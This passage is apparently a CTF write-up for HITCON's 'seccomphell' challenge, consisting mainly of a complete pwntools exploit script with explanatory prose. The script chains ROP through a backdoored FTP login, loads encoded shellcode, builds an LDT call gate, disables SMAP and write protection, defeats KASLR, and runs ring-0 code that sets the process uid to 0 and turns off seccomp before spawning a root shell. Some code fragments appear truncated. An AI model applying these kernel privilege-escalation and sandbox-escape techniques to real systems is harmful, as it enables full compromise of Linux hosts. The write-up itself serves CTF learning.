      .filter = (struct sock_filter*)&seccomp_filter,

  assert(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != -1);
  assert(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != -1);

which basically creates a struct that looks like this:

00:0000 rdx rsp 0x7fffffffe750 ◂— 1
01:0008-018     0x7fffffffe758 —▸ 0x7fffffffe760 ◂— 0x7fff000000000006
02:0010-010     0x7fffffffe760 ◂— 0x7fff000000000006

and add it by calling do_seccomp directly.

Well this added our rules to the top of our linked list and incremented the filter_count, but we still can't call new syscalls. This is because SECCOMP_RET_KILL_PROCESS takes precidents over SECCOMP_RET_ALLOW according to man pages.

But what we can do now is manually reduce the seccomp.filter_count to 1 and remove our previous seccomp_filter seccomp->filter_count.prev = NULL and we successfully disabled seccomp.

Stage 5.2:

PAYLOAD = 0x401000

# fake seccomp filter RETURN ALLOW
seccomp = flat(
 1, # size
 PAYLOAD+0x18, # args (ptr to rules)
 0x7fff000000000006, # rules (RETURN ALLOW)



# ffffffff810fc820 T commit_creds
COMMIT_CRED = 0xfc820

# ffffffff810fccd0 T prepare_creds
PREP_CRED = 0xfccd0

# https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L2046
# ffffffff81200cd0 t do_seccomp
DO_SECCOMP = 0x200cd0


# current struct offset from gs

# seccomp_filter: https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L22

ring0 = asm(f"""
  // Get access to per-cpu variables (current, mostly) via swapgs

  // Get the current page table.
  movq rbx, cr3

  // Switch to the kernel page table.
  andq rbx, {~PTI_SWITCH_MASK}
  movq cr3, rbx

  // and rdi, {~0xffffff}
  sub rdi, {KASLR_WRITE_TO +0x400000}
  and rdi, {~0xfffff}
  mov r15, rdi

  // add fake seccomp filter, allow all
  lea rax, [r15+{DO_SECCOMP}]
  xor rsi, rsi
  mov rdx, {PAYLOAD+0x8}
  call rax

  // privilige escalation
  // crpt_cred = prepare_cred();

  lea rax, [r15+{PREP_CRED}]
  call rax

  // crpt_cred.uid = 0;
  // crpt_cred.gid = 0;
  mov rdi, rax
  movq [rdi+8], 0

  // commit_creds(crpt_cred);
  lea rax, [r15+{COMMIT_CRED}]
  call rax


  // get current
  movq rax, qword ptr gs:[{CURRENT}]

  // current.seccomp.count = 1 (was 2, fake and init)
  mov dword ptr[rax+0xc6c], 1

  // get current.seccomp.seccomp_filter
  mov rax, qword ptr[rax+0xc70]
  // get current.seccomp.seccomp_filter->prev = NULL
  mov qword ptr[rax+0x90], 0

  // Swap back

  // Switch the page table back around
  orq rbx, {PTI_SWITCH_MASK}
  movq cr3, rbx

  // Build an `iret` stackframe rather than a `ret far` stack frame.
  // => %rip
  popq r8 
  // => %cs
  popq r9

  // Set IF in the new RFLAGS (like sti)
  orq rsp, {1 << 9}
  pushq r9
  pushq r8


Final stage: get flag

At this point everthing should be straightforward, but sadly this version worked, but had a pretty bad successrate. This is because of the calls probably reenable interrupts, as mentioned in one_byte writeup. But this exploit was good enough to get the flag.


Please get a full root shell

Actually this wasn't the flag, we need to actually use our root shell to find the flag.

using find / -name '*flag*' 2> /dev/null we find a flag generator /root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag, that we can execute the get the flag.

while (out := rl().rstrip()) != b'[+] spawning shell' :


linfo("FINAL STAGE")

sl('echo PWND')
# sla('PWND', 'find / -name '*flag*' 2> /dev/null')
sla('PWND', '/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag')

it() # or t.interactive()

improving success rate

After the CTF concluded I talked with others that solved the challenge and realized why my successrate was so bad, it was the calls. So inspired by other peoples solution I rewrote my shellcode to have a way better successrate.

For privilige escalation we manually edit the cred struct, that is linked in current to become root (normally there are credand real_cred), but in this scenario they are the same so we simply edit the uid and gid of one to become root .

Disabling seccomp is more interesting, basically in thread_info there is an attribute called syscall_work that set's flags for e.g. enabling seccomp. So what we need to do is to unset the flag and we can now execute all syscalls. But this only works for the current work_struct, if we execve another binary seccomp get's reset.

So additionally we need to set the seccomp->mode to SECCOMP_MODE_DISABLED

Stage 5.2 (improved):


# current (task_struct) offset from gs
# task_struct: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748

# cred: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/cred.h#L111 

# seccomp: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22
# seccomp->mode: https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10

# thread_info: https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64
# syscall_work: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51

ring0 = asm(f"""

  /* PROLOGUE */

  // Get access to per-cpu variables (current, mostly) via swapgs

  // Get the current page table.
  movq rbx, cr3

  // Switch to the kernel page table.
  andq rbx, {~PTI_SWITCH_MASK}
  movq cr3, rbx

  // get current
  movq r15, qword ptr gs:[{CURRENT}]


  // current->cred.uid = 0
  mov rax, qword ptr[r15+{CRED_OFF}]
  mov dword ptr[rax+{UID_OFF}], 0 


  // current.thread_info.seccomp_off &= ~SYSCALL_WORK_SECCOMP
  and qword ptr[r15+{SYSCALL_WORK_OFF}], {~SYSCALL_WORK_SECCOMP}

  // current.seccomp.mode = SECCOMP_MODE_DISABLED   
  mov dword ptr[r15+{SECCOMP_OFF}], {SECCOMP_MODE_DISABLED}

  /* EPILOG */

  // Swap back

  // Switch the page table back around
  orq rbx, {PTI_SWITCH_MASK}
  movq cr3, rbx

  // Build an `iret` stackframe rather than a `ret far` stack frame.
  // => %rip
  popq r8 
  // => %cs
  popq r9

  // Set IF in the new RFLAGS (like sti)
  orq rsp, {1 << 9}
  pushq r9
  pushq r8



Flag: hitcon{if_kernel_goes_brrrr_seccomp_filter_becomes_this:https://www.youtube.com/watch?v=nTT2fNyKgUE}


#!/usr/bin/env python3
from pwn import *

GDB_OFF = 0x555555554000
IP = 'seccomphell.chal.hitconctf.com' if args.REMOTE else 'localhost' 
PORT =  int(sys.argv[1]) if len(sys.argv) >= 2 else 22222

BINARY = './bins/i_am_not_backdoor.bin'
ARGS = []
ENV = {
} # os.environ
GDB = f"""
set follow-fork-mode parent

# backdoor
# b * 0x4018dc

# rop start
# b * 0x401d05

# loader
hb * 0x400000

# payload
hb * 0x401000


context.binary = exe = ELF(BINARY, checksec=False)
# libc = ELF('', checksec=False)
context.aslr = True

cst = constants
shc = shellcraft

linfo = lambda x, *a: log.info(x, *a)
lwarn = lambda x, *a: log.warn(x, *a)
lerror = lambda x, *a: log.error(x, *a)
lprog = lambda x, *a: log.progress(x, *a)

byt = lambda x: x if isinstance(x, bytes) else x.encode() if isinstance(x, str) else repr(x).encode()
phex = lambda x, y='': print(y + hex(x))
lhex = lambda x, y='': linfo(y + hex(x))
pad = lambda x, s=8, v=b'\0', o='r': byt(x).ljust(s, byt(v)) if o == 'r' else byt(x).rjust(s, byt(v))
padhex = lambda x, s=None: pad(hex(x)[2:],((x.bit_length()//8)+1)*2 if s is None else s, b'0', 'l')
upad = lambda x: u64(pad(x))
tob = lambda x: bytes.fromhex(padhex(x).decode())

gelf = lambda elf=None: elf if elf else exe
srh = lambda x, elf=None: gelf(elf).search(byt(x)).__next__()
sasm = lambda x, elf=None: gelf(elf).search(asm(x), executable=True).__next__()
lsrh = lambda x: srh(x, libc)
lasm = lambda x: sasm(x, libc)

cyc = lambda x: cyclic(x)
cfd = lambda x: cyclic_find(x)
cto = lambda x: cyc(cfd(x))

t = None
gt = lambda at=None: at if at else t
sl = lambda x, t=None, *a, **kw: gt(t).sendline(byt(x), *a, **kw)
se = lambda x, t=None, *a, **kw: gt(t).send(byt(x), *a, **kw)
ss = lambda x, s, t=None, *a, **kw: sl(x, t, *a, **kw) if len(y) < s else se(x, *a, **kw)
sla = lambda x, y, t=None, *a, **kw: gt(t).sendlineafter(byt(x), byt(y), *a, **kw)
sa = lambda x, y, t=None, *a, **kw: gt(t).sendafter(byt(x), byt(y), *a, **kw)
sas = lambda x, y, s, t=None, *a, **kw: sla(x, y, t, *a, **kw) if len(y) < s else sa(x, y, *a, **kw)
ra = lambda t=None, *a, **kw: gt(t).recvall(*a, **kw)
rl = lambda t=None, *a, **kw: gt(t).recvline(*a, **kw)
rls = lambda t=None, *a, **kw: rl(t=t, *a, **kw)[:-1]
re = lambda x, t=None, *a, **kw: gt(t).recv(x, *a, **kw)
ru = lambda x, t=None, *a, **kw: gt(t).recvuntil(byt(x), *a, **kw)
it = lambda t=None, *a, **kw: gt(t).interactive(*a, **kw)
cl = lambda t=None, *a, **kw: gt(t).close(*a, **kw)

vm = None
def get_target(**kw):
  global vm

  if args.REMOTE or args.TEST:
    # context.log_level = 'debug'
    return remote(IP, PORT)

  if args.LOCAL:
    if args.GDB:
      return gdb.debug([BINARY] + ARGS, env=ENV, gdbscript=GDB, **kw)
    return process([BINARY] + ARGS, env=ENV, **kw)

    from vagd import Dogd, Qegd, Box # only load vagd if needed
    log.error("Failed to import vagd, either run locally using LOCAL or install it")
  if not vm:
    vm = Dogd(BINARY, image=Box.DOCKER_JAMMY, ex=True, fast=True)  # Docker
    # vm = Qegd(BINARY, img=Box.QEMU_JAMMY, ex=True, fast=True)  # Qemu
  if vm.is_new:
    log.info("new vagd instance") # additional setup here
  return vm.start(argv=ARGS, env=ENV, gdbscript=GDB, **kw)

t = get_target()

# STAGE 1: ROP BACKDOOR                     #

linfo("STAGE 1: ROP")

std = b'/dev/pts/0\0'

uname = std

passwd = b'' 

sas('220 (vsFTPd 2.3.4)', uname, 0x80)
sas('331 Please specify the password.', passwd, 0x80)

sret_gen = exe.search(asm('syscall ; ret'), executable=True)
SYSCALL_RET = next(sret_gen)

PIVOT = 0x4a7b00

rop = ROP(exe)
rop.raw(PIVOT+0x100) # rbp
rop.call(sasm('mov rax, rbx ; pop rbx ; ret'))
rop.rdi = 0x258 
rop.call(sasm('sub rax, rdi ; ret'))
rop.call(sasm('mov rdi, rax ; ret'))
rop.rax = cst.SYS_open 
rop.rsi = cst.O_RDWR

rop.rsi = PIVOT
# rop.rdx = 0x400

rop.call(sasm('mov rdi, rax ; ret'))
rop.call(sasm('leave ; ret'))

linfo("loader len: 0x%x", len(bytes(rop)))
assert len(bytes(rop)) <= 0x98

# input()
sas('530 Login incorrect.', bytes(rop), 0x98)

# STAGE 2: PIVOT ROP                        #

linfo("STAGE 2: PIVOT")

LOADER = 0x400000

pivot = ROP(exe)
pivot.raw(0x6fe1be2) # rbp

pivot.rax = cst.SYS_open
pivot.rdi = PIVOT
pivot.rsi = cst.O_RDWR
pivot.rdx = 0

pivot.rax = cst.SYS_mprotect + 1
pivot.call(sasm('sub rax, 1 ; ret'))
pivot.rdi = LOADER
pivot.rsi = 0x5000
pivot.rdx = cst.PROT_READ | cst.PROT_WRITE | cst.PROT_EXEC

pivot.rax = cst.SYS_write
pivot.rdi = cst.STDOUT_FILENO
pivot.rsi = PIVOT+0x10
pivot.rdx = 8

pivot.rax = cst.SYS_read
pivot.rdi = cst.STDIN_FILENO
pivot.rsi = LOADER 
pivot.rdx = 0x1000



chain = flat({
  0: std,
  0x10: b'STAGE 2',
  0x18: b'STAGE 3',
  0x20: b'FAIL',
  0x100: pivot

linfo("pivot len: 0x%x", len(chain))


# STAGE 5.2: RING 0 PAYLOAD                 #

# https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/


# current (task_struct) offset from gs
# task_struct: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748

# cred: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/cred.h#L111 

# seccomp: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22
# seccomp->mode: https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10

# thread_info: https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64
# syscall_work: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51

ring0 = asm(f"""

  /* PROLOGUE */

  // Get access to per-cpu variables (current, mostly) via swapgs

  // Get the current page table.
  movq rbx, cr3

  // Switch to the kernel page table.
  andq rbx, {~PTI_SWITCH_MASK}
  movq cr3, rbx

  // get current
  movq r15, qword ptr gs:[{CURRENT}]


  // current->cred.uid = 0
  mov rax, qword ptr[r15+{CRED_OFF}]
  mov dword ptr[rax+{UID_OFF}], 0 


  // current.thread_info.seccomp_off &= ~SYSCALL_WORK_SECCOMP
  and qword ptr[r15+{SYSCALL_WORK_OFF}], {~SYSCALL_WORK_SECCOMP}

  // current.seccomp.mode = SECCOMP_MODE_DISABLED   
  mov dword ptr[r15+{SECCOMP_OFF}], {SECCOMP_MODE_DISABLED}

  /* EPILOG */

  // Swap back

  // Switch the page table back around
  orq rbx, {PTI_SWITCH_MASK}
  movq cr3, rbx

  // Build an `iret` stackframe rather than a `ret far` stack frame.
  // => %rip
  popq r8 
  // => %cs
  popq r9

  // Set IF in the new RFLAGS (like sti)
  orq rsp, {1 << 9}
  pushq r9
  pushq r8


# STAGE 5.1: CALL GATE TRAMPOLIN            #

# https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/

TRAMPOLIN = 0xc00000


RING0_LEN = len(ring0)

# write ring0 payload to kernel space and execute 
trampolin = asm(f"""

  // Read LSTAR to bypass KASLR
  mov ecx, {MSR_LSTAR}
  shl rdx, 32
  or rdx, rax
  subq rdx, {KASLR_LSTAR}
  movq rbp, rdx

  // Disable WP
  movq r8, cr0
  andq r8, {(~(1 << 16))}
  movq cr0, r8

  // Copy stage 5.2 to the mapped kernel entry point
  movq rdi, rbp
  addq rdi, {KASLR_WRITE_TO}
  movq r15, rdi
  lea rsi, [rip+RING_0]
  mov ecx, {RING0_LEN}
  rep movsb

  // Jump there.
  jmp r15

""") + ring0

TRAMPOLIN_LEN = len(trampolin)


far_func = p64(0x67dead8664)

payload = bytearray(far_func+asm(f"""
  {shc.echo("STAGE 4")}

  {shc.echo("[+] INIT\n")}

  {shc.syscall(cst.SYS_open, 'rsp', cst.O_RDWR, 0)}
  cmp rax, 0
  jl FAIL

  mov rbx, rax
  {shc.echo("[+] backdoor fd: ")}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}

  {shc.echo("\n[+] START\n")}

  // disable SMAP
  {shc.echo("[+] 'stac' in CPL3\n")}
  or         QWORD PTR [rsp],0x40000

  {shc.echo("[+] modify_ldt user\n")}
  mov        rax, 0x100001000
  push       rax
  mov        rax, 0x100000000c
  push       rax
  mov        rsi, rsp

  {shc.syscall(cst.SYS_modify_ldt, 0x11, 'rsi', 0x10)}

  {shc.echo("[+] modify_ldt high\n")}

  mov        rax, 0x380000FFFF
  push       rax
  mov        rax, 0xFFFF0000000E
  push       rax
  mov        rsi, rsp

  {shc.syscall(cst.SYS_modify_ldt, 0x11, 'rsi', 0x10)}

  {shc.echo("[+] write to backdoor\n")}
  mov rsi, rsp
  {shc.syscall(cst.SYS_write, 'rbx', 'rsi', 0)}
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] cpy trampolin\n")}
  {shc.mmap_rwx(size=0x10000, address=TRAMPOLIN)}
  lea rsi, [rip+TRAMPOLIN]
  {shc.memcpy(TRAMPOLIN, 'rsi', TRAMPOLIN_LEN)}

  // call CALL GATE for privilige escalation
  {shc.echo("[+] go to CPL 0\n")}
  call   FWORD PTR ds:{PIVOT-0xa6b00}

  // should be root
  {shc.echo("[+] spawning shell\n")}
  jmp FAIL

  mov rbx, rax
  neg rbx
  {shc.echo("[-] errno: ")}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}
  {shc.echo("\n[-] FAIL\n")}
  int 3

""") + trampolin).ljust(0x500, asm('nop'))


PAYLOAD = 0x401000
PAYLOAD_LEN = len(payload)

loader = bytearray(asm(f"""
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x18, 7)}
  xor rbx, rbx
  // get two characters (one byte)
  push 0
  {shc.syscall(cst.SYS_read, cst.STDIN_FILENO, 'rsp', 2)}
  cmp rax, 2
  jl FAIL
  pop rax
  sub ah, 0x41 
  sub al, 0x41 
  shl al, 2
  shl al, 2
  shr rax, 2
  shr rax, 2
  mov BYTE PTR [rbx+{PAYLOAD}], al
  inc rbx
  cmp rbx, {PAYLOAD_LEN}
  jb LOAD

  // jmp to next stage
  mov rax, {PAYLOAD+0x8}
  jmp rax

  {shc.write(cst.STDOUT_FILENO, PIVOT+0x20, 5)}
  int 3

assert all(bad not in loader for bad in b"\x04\n"), "can't have certain escape chars"

# send all the code

linfo("STAGE 3: LOADER")

# linfo(disasm(loader))
sla("STAGE 2", bytes(loader))

# custom encoding:
#  hex starting a 'A'
#  and least significant nibble first

payload_enc = b''
for b in payload:
  lo = (b & 0xf) + 0x41
  hi = ((b & 0xf0) >> 4) + 0x41
  payload_enc += bytes((lo, hi))

linfo("STAGE 4: PAYLOAD")

sla('STAGE 3', payload_enc)

# linfo(disasm(payload))
linfo("payload len: 0x%x", len(payload))

ru("STAGE 4")

context.newline = b'\r\n'

while (out := rl().rstrip()) != b'[+] spawning shell' :


# FINAL STAGE: GET FLAG                     #

linfo("FINAL STAGE")

sl('echo PWND')
sla('PWND', '/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag')

it() # or t.interactive()
